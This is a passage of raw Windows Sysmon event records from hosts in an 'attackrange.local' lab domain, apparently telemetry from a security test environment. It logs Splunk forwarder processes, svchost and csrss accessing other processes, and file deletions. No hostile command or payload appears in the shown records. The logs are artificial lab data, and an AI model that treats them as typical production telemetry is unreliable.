Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103010Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.339{58E9C193-B1B0-615A-B701-00000000FC01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080925Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:01.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29D9ADCD804A0915D027BEC77BB3818,SHA256=5DD9C698820461D0A0F21C8EEAB666FB4FC2B4C00986E503887768FDD0CA7546,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103021Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:01.869{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103020Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:01.557{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=622C7731377883955940402E8119B9C4,SHA256=65182BB992C89AD11D8956ED048435F61BF13E5C4E964478FD232AB0DBD1372E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080926Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:02.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=603D2D2CC06D54CDB5CA3737A836C7C3,SHA256=EB52E6235566F40A94DDC99928B7DB3407F5B88E9FCC2FD7FC1FB89A2106D32D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103031Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.588{58E9C193-B1B2-615A-B801-00000000FC01}45806460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103030Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=595F12F25401EF35D485D4DF533F626F,SHA256=1939F464ACA4F826BEEB0F1B2ED7C8E56CA2C329BCC610D5C637FE95619AE6C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103029Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1B2-615A-B801-00000000FC01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103028Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103027Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103026Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103025Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103024Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B1B2-615A-B801-00000000FC01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103023Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.353{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1B2-615A-B801-00000000FC01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103022Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:02.354{58E9C193-B1B2-615A-B801-00000000FC01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080927Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:03.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8216F7C367DE1C516A7EE5508D0C918F,SHA256=8BA04822C51429C292D101DC2DDB54D72F87D3A8DC23C1D8A3DDD51A00A5FBBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103050Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1B3-615A-BA01-00000000FC01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103049Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103048Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103047Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103046Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103045Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B1B3-615A-BA01-00000000FC01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103044Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1B3-615A-BA01-00000000FC01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103043Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.932{58E9C193-B1B3-615A-BA01-00000000FC01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103042Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E11FF8399D25DE6F447EC5F26D94B86,SHA256=6405A6B057BDDC916B372265ACEF8885C3A4B55FED8ED4B081C1CF28BB7F7DFC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103041Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.447{58E9C193-B1B3-615A-B901-00000000FC01}47364816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103040Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.369{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0A7A0DAA0042A98146768CA1FEC7A48,SHA256=40FF53AC2F4529D20E93231C63097A1F808A3D7A049701BB7A27E36CFB783E85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103039Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1B3-615A-B901-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103038Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103037Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103036Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103035Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 